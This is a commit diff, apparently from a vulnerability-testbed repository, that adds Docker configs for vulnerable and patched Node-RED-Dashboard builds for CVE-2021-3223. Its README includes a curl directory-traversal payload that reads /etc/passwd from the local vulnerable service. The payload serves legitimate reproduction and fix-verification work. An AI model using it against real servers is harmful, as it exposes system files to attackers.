google · robert-doyensec · May 14, 2026 · Jun 3, 2026
diff --git a/nodejs/node-red/CVE-2021-3223/Dockerfile.safe b/nodejs/node-red/CVE-2021-3223/Dockerfile.safe
@@ -0,0 +1,5 @@
+FROM nodered/node-red:1.1.2
+
+RUN npm install --unsafe-perm --no-update-notifier --no-fund --only=production
+
+RUN npm install node-red-dashboard@2.26.2
diff --git a/nodejs/node-red/CVE-2021-3223/Dockerfile → ...js/node-red/CVE-2021-3223/Dockerfile.vuln b/nodejs/node-red/CVE-2021-3223/Dockerfile → ...js/node-red/CVE-2021-3223/Dockerfile.vuln
diff --git a/nodejs/node-red/CVE-2021-3223/README.md b/nodejs/node-red/CVE-2021-3223/README.md
@@ -4,3 +4,27 @@ This directory contains the deployment configs for a directory traversal
 vulnerability in Node-RED-Dashboard with node-red version (1.1.2).
 
 The deployed service has name `cve-2021-3223` and listens on port `1880`.
+
+## Docker Compose
+```
+docker compose up
+```
+
+The vulnerable service will listen on port `8081` and the safe service will listen on port `8082`.
+
+## Confirming the vulnerability
+
+
+```
+curl --path-as-is 'localhost:8081/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
+```
+Vulnerable output:
+```
+root:x:0:0:root:/root:/bin/ash
+bin:x:1:1:bin:/bin:/sbin/nologin
+...
+```
+Safe output (replace the port with 8082):
+```
+Not Found
+```
diff --git a/nodejs/node-red/CVE-2021-3223/docker-compose.yml b/nodejs/node-red/CVE-2021-3223/docker-compose.yml
@@ -0,0 +1,14 @@
+version: "3.9"
+
+services:
+  vuln:
+    build:
+      dockerfile: Dockerfile.vuln
+    ports:
+      - "8081:1880"
+
+  safe:
+    build:
+      dockerfile: Dockerfile.safe
+    ports:
+      - "8082:1880"